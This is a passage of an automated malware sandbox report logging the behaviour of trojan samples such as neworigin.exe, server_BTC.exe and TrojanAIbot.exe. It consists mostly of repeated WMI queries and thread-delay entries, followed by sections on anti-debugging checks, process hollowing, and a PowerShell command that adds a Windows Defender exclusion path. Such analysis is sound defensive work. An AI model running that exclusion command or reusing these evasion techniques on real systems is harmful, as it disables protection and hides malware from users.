                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E45908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,4_2_02E45908
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99792Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99578Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99227Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99027Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98915Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98788Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98667Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98560Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98454Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98310Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98167Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97929Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97796Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97680Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97578Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97466Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97349Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97213Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97089Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96966Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96808Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96390Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96268Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96144Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96020Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95893Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95765Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95653Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95542Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95430Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95320Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95200Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95087Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94968Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94853Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94743Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94634Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94495Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94377Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94244Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94113Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93977Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93660Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93392Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93166Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99853Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99688Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 60000
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 60000
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99825
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99378
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98963
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98847
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98718
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98603
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98484
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98353
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98220
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98089
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97956
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97754
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97499
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97358
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97238
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97100
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96991
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96789
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96199
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95844
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95705
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95481
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95325
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95156
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94986
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94810
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94636
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94311
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94191
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94042
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93915
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93745
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99852
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99690
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99555
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99394
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99226
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99059
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98890
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98628
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98368
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98223
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98056
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97817
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97245
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97005
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96861
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96702
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96591
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96480
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96368
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96263
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96151
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96032
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95904
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95794
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95685
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95576
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95467
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95357
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95248
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95139
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95019
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94899
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94639
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94495
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94283
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94154
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94044
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93931
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93825
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93717
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93607
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93498
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199968
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199859
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199750
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199640
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199531
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199422
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199312
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 1199202
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99873
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99757
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99641
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99528
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99420
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99310
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99201
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99091
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98983
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98873
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98764
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98654
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98545
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98436
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98327
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98210
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97967
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97824
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97611
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97483
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97372
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97260
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97153
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97045
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96936
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96826
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96716
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96608
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96498
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96389
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96280
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96170
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 96061
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95951
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95842
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95733
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95620
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95514
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95405
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95295
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95165
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 95027
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94906
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94635
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94527
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94420
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94311
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94202
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 94092
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93983
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 93872
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
                      Source: x.exe, 00000004.00000002.1464571050.000000000062E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.1464571050.000000000067A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Wisrysxl.PIF, 0000001A.00000002.1591107014.00000000008DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
                      Source: neworigin.exe, 0000000D.00000002.1598666321.00000000012FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllyy90
                      Source: neworigin.exe, 0000001D.00000002.3786952133.00000000010D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exeAPI call chain: ExitProcess graph end nodegraph_4-38355
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFAPI call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E5F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,4_2_02E5F744
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess queried: DebugPort
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02E5894C LoadLibraryW,GetProcAddress,FreeLibrary,4_2_02E5894C
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 12_1_004BF794 mov eax, dword ptr fs:[00000030h]12_1_004BF794
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 28_1_004BF794 mov eax, dword ptr fs:[00000030h]28_1_004BF794
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess token adjusted: Debug
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 12_1_004015D7 SetUnhandledExceptionFilter,12_1_004015D7
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 12_1_004015D7 SetUnhandledExceptionFilter,12_1_004015D7
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 28_1_004015D7 SetUnhandledExceptionFilter,28_1_004015D7
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifCode function: 28_1_004015D7 SetUnhandledExceptionFilter,28_1_004015D7
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFMemory allocated: C:\Users\Public\Libraries\lxsyrsiW.pif base: 400000 protect: page execute and read and write
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000Jump to behavior
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFSection unmapped: C:\Users\Public\Libraries\lxsyrsiW.pif base address: 400000
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Users\Public\Libraries\lxsyrsiW.pif base: 2E1008Jump to behavior
